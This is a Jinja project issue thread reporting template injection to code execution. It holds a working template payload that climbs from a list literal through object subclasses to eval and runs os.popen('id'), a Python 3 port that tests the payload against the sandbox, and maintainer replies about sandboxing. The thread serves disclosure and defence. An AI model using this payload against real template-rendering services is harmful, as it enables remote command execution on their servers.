Jinja: Execute arbitrary code in a template without a sandbox environment.

Created on 23 Feb 2016  ·  6 comments  ·  Source: pallets/jinja

When I used the Jinja2 template framework in my project, I found a way to call "os.popen('id')" or other functions without registering them as globals.
It's easy to get a shell when an attacker can control the template content. Is that by design?

PoC:

from jinja2 import Template

# Python 2 PoC: start from a list literal, walk up to `object`, enumerate every
# loaded class, pick warnings.catch_warnings (a pure-Python class), and read the
# module globals of its __init__ (func_globals in Python 2). The dict value that
# has an 'eval' key is the builtins dict, so eval is reachable from the template
# without anything having been registered as a global.
content = '''
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").popen("id").read()') }}
{% endif %} {% endif %} {% endfor %}
{% endif %} {% endfor %}
'''
# Python 2 print statement; with Jinja2 2.8 this prints the output of `id`.
print Template(content).render()

I tested this code with Python 2 (2.7.10) and Jinja2 (2.8); if it works, it will print your user's uid...
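Added example, not part of the issue or of the Jinja project's own code: the same gadget walk ported to Python 3 (`func_globals` became `__globals__`), written once as plain Python to show what the template is really doing, and then rendered both with a plain `Environment` and with `jinja2.sandbox.SandboxedEnvironment`, the mitigation the maintainer points to in the comments. Assumptions: the payload calls `os.getpid()` instead of `os.popen('id')` so the result can be checked deterministically, and jinja2 is imported lazily so the pure-Python gadget search runs even where jinja2 is not installed.

```python
import os


def current_pid():
    """Marker the payload must reproduce to prove it really reached eval."""
    return str(os.getpid())


# Python 3 port of the issue's template (assumption: func_globals renamed to
# __globals__, and os.getpid() in place of os.popen('id') so the output is checkable).
PAYLOAD = '''
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}
{% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %}
{% if 'eval' in b.keys() %}
{{ b['eval']('__import__("os").getpid()') }}
{% endif %} {% endif %} {% endfor %}
{% endif %} {% endfor %}
'''


def find_eval_gadget():
    """The template's walk in plain Python: among object's subclasses, find one
    whose __init__ is a Python function (so it carries __globals__) and whose
    module globals contain a dict with an 'eval' key (the builtins dict).
    Returns (class name, eval callable) or None."""
    for cls in object.__subclasses__():
        try:
            init = getattr(cls, "__init__", None)
            module_globals = getattr(init, "__globals__", None)
        except Exception:  # a few classes raise on attribute access; skip them
            continue
        if not isinstance(module_globals, dict):
            continue
        for value in module_globals.values():
            if type(value) is dict and callable(value.get("eval")):
                return cls.__name__, value["eval"]
    return None


def run_payload(source, sandboxed):
    """Render `source` with a plain Environment or with SandboxedEnvironment.
    Returns ('escaped', output) if the template reached eval (the output carries
    this process's pid), ('contained', reason) if it was stopped, or
    ('unavailable', reason) when jinja2 is not installed."""
    try:
        from jinja2 import Environment
        from jinja2.exceptions import SecurityError
        from jinja2.sandbox import SandboxedEnvironment
    except ImportError:
        return "unavailable", "jinja2 is not installed"
    env = SandboxedEnvironment() if sandboxed else Environment()
    try:
        output = env.from_string(source).render()
    except SecurityError as exc:
        # The sandbox refuses underscore-prefixed attributes such as __class__,
        # so the walk never gets past the first step.
        return "contained", f"SecurityError: {exc}"
    if current_pid() in output:
        return "escaped", output.strip()
    return "contained", "rendered without reaching eval"


if __name__ == "__main__":
    print("gadget:", find_eval_gadget())
    print("plain Environment:   ", run_payload(PAYLOAD, sandboxed=False))
    print("SandboxedEnvironment:", run_payload(PAYLOAD, sandboxed=True))
```

The sandbox only closes the attribute-walk door; a template that can call `__import__` through some object a view passes into the context is still game over, which is the point of the maintainer's remark that user-supplied templates are a bad idea even with the sandbox.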

All 6 comments

You should not execute untrusted templates in a non-sandboxed environment. That's exactly why the sandbox exists (and to be honest, even with a sandbox I would not let users provide arbitrary Jinja templates)

So, is it necessary to take measures to prevent this case? I think there are some specific applications that would allow users to edit the template content, but there are no practical examples.

I think it is necessary to use the sandbox by default, because Flask and other web frameworks that use Jinja2 do not do this.

Why would you want to use the sandbox by default? In most cases templates cannot be changed by untrusted people who don't have access to the code anyway.

There is a case of remote code execution via Flask/Jinja2 template injection at Uber.
link: http://www.tuicool.com/articles/uE3YNjY

Enabling sandboxing by default is not possible due to backwards compat, and also not reasonable because most templates (in Flask) are trusted.
